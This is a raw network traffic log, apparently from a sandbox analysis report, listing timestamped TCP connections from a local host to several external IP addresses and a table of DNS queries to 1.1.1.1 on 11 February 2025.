                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.120913982 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.120927095 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121241093 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121282101 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121305943 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121320963 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121330976 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121351004 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.121967077 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122040987 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122067928 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122081995 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122095108 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122107029 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122127056 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122181892 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122219086 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122226954 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.122982025 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.123023033 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.123034000 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.123064041 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.123848915 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.123959064 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.124001980 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.145826101 CET44349749104.16.5.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.145962000 CET44349749104.16.5.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.146075010 CET49749443192.168.2.6104.16.5.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.257047892 CET49748443192.168.2.6104.18.95.41
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.257081032 CET44349748104.18.95.41192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.260796070 CET49749443192.168.2.6104.16.5.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.260823011 CET44349749104.16.5.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.344955921 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.345010996 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.345077991 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.345587969 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.345607042 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.797627926 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.797904015 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.797926903 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.798899889 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.798964024 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.799290895 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.799360037 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.799422026 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.799431086 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:14.848145008 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:15.027908087 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:15.028081894 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:15.029457092 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:15.029628992 CET49750443192.168.2.6104.16.2.189
                                                                                                                                                                                                                            Feb 11, 2025 16:27:15.029654026 CET44349750104.16.2.189192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.729120016 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.729156017 CET44349751104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.729221106 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.729795933 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:21.729813099 CET44349751104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.191725016 CET44349751104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.192843914 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.192867994 CET44349751104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.193928003 CET44349751104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.193989992 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.194488049 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.194506884 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.194557905 CET44349751104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.194574118 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.194605112 CET49751443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.195019007 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.195067883 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.195128918 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.195359945 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.195375919 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.664213896 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.664551973 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.664580107 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.665568113 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.665652037 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.666815042 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.666878939 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.667009115 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.711343050 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.721415997 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.721431971 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.772074938 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.916471958 CET8049711217.20.57.36192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.916625023 CET4971180192.168.2.6217.20.57.36
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.916665077 CET4971180192.168.2.6217.20.57.36
                                                                                                                                                                                                                            Feb 11, 2025 16:27:22.921482086 CET8049711217.20.57.36192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.252937078 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.253062010 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.253113031 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.254604101 CET49752443192.168.2.6104.21.2.8
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.254628897 CET44349752104.21.2.8192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.401391029 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.401448965 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.401511908 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.401804924 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.401818037 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.884875059 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.892293930 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.892328978 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.893394947 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.893462896 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894490957 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894510031 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894568920 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894581079 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894756079 CET44349754172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894757986 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.894807100 CET49754443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.895159960 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.895205975 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.895265102 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.895503998 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:23.895519018 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.353049994 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.353321075 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.353353024 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.354350090 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.354415894 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.354749918 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.354813099 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.354881048 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.399328947 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.409881115 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.409893036 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.456768990 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.943696022 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.943800926 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.945127010 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.945316076 CET49755443192.168.2.6172.67.186.200
                                                                                                                                                                                                                            Feb 11, 2025 16:27:24.945339918 CET44349755172.67.186.200192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:25.528331995 CET44349740188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:25.528408051 CET44349740188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:25.528472900 CET49740443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:25.598181009 CET49740443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:25.598220110 CET44349740188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:29.308439016 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:29.308500051 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:29.308634043 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:29.309237957 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:29.309248924 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.115931034 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.116009951 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.118060112 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.118068933 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.118505955 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.120309114 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.120459080 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.120465994 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.120596886 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.163331985 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.336251020 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.336416006 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.336500883 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.336608887 CET49757443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:30.336627960 CET4434975740.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:32.676049948 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:32.676126003 CET44349759188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:32.676232100 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:32.676561117 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:32.676583052 CET44349759188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.160836935 CET44349759188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.161119938 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.161135912 CET44349759188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162173986 CET44349759188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162242889 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162575006 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162586927 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162636995 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162641048 CET44349759188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162704945 CET49759443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162949085 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.162997007 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.163062096 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.163330078 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.163343906 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.623009920 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.623332024 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.623348951 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.623689890 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.624070883 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.624144077 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:33.677498102 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.528500080 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.528574944 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.528762102 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.755613089 CET49760443192.168.2.6188.114.96.3
                                                                                                                                                                                                                            Feb 11, 2025 16:27:48.755650043 CET44349760188.114.96.3192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.182390928 CET5814753192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.187228918 CET53581471.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.187335968 CET5814753192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.192171097 CET53581471.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.650768042 CET5814753192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.655847073 CET53581471.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:51.655906916 CET5814753192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:52.865190983 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:27:52.865220070 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:52.865314007 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:27:52.865933895 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:27:52.865943909 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.529469967 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.529989958 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.530016899 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.530335903 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.530693054 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.530746937 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:53.581159115 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:27:55.823601961 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:55.823664904 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:55.823770046 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:55.824347973 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:55.824364901 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.619349957 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.619452953 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.621843100 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.621854067 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.622107029 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.624222040 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.624275923 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.624284029 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.624417067 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:56.671338081 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:57.074995995 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:57.075088024 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:57.075148106 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:57.075454950 CET58150443192.168.2.640.113.110.67
                                                                                                                                                                                                                            Feb 11, 2025 16:27:57.075479031 CET4435815040.113.110.67192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:28:03.453788996 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:28:03.453862906 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:28:03.454073906 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:28:04.755558968 CET58149443192.168.2.6142.250.186.164
                                                                                                                                                                                                                            Feb 11, 2025 16:28:04.755578995 CET44358149142.250.186.164192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:28:11.629985094 CET49710443192.168.2.620.190.159.4
                                                                                                                                                                                                                            Feb 11, 2025 16:28:11.635268927 CET4434971020.190.159.4192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:28:11.635309935 CET49710443192.168.2.620.190.159.4
                                                                                                                                                                                                                            Feb 11, 2025 16:28:14.192219973 CET49713443192.168.2.620.190.159.4
                                                                                                                                                                                                                            Feb 11, 2025 16:28:14.199069023 CET4434971320.190.159.4192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:28:14.199117899 CET49713443192.168.2.620.190.159.4
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Feb 11, 2025 16:26:48.558410883 CET53540781.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:48.569057941 CET53521221.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:49.583827019 CET53556471.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.802133083 CET5854853192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.802299976 CET6292253192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.808736086 CET53629221.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:52.808995008 CET53585481.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.415600061 CET6153153192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.415730000 CET6160053192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.593069077 CET53616001.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:54.599780083 CET53615311.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:26:56.499535084 CET53649991.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:06.635793924 CET53593671.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.638556957 CET6085153192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.638756037 CET6225053192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.654545069 CET53622501.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:09.659410954 CET53608511.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.809851885 CET6309253192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.809984922 CET6382553192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.810713053 CET5649753192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.811084986 CET5122253192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.811713934 CET6532553192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.811949015 CET5277253192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818316936 CET53638251.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818873882 CET53630921.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.818885088 CET53564971.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.819751024 CET53512221.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820080996 CET53653251.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:11.820095062 CET53527721.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.721669912 CET5849153192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.721996069 CET5688853192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.728538036 CET53584911.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.728818893 CET53568881.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.761250019 CET5364053192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.761532068 CET6224253192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.768769979 CET53622421.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:12.769136906 CET53536401.1.1.1192.168.2.6
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.390249968 CET5550653192.168.2.61.1.1.1
                                                                                                                                                                                                                            Feb 11, 2025 16:27:13.390661001 CET5100353192.168.2.61.1.1.1
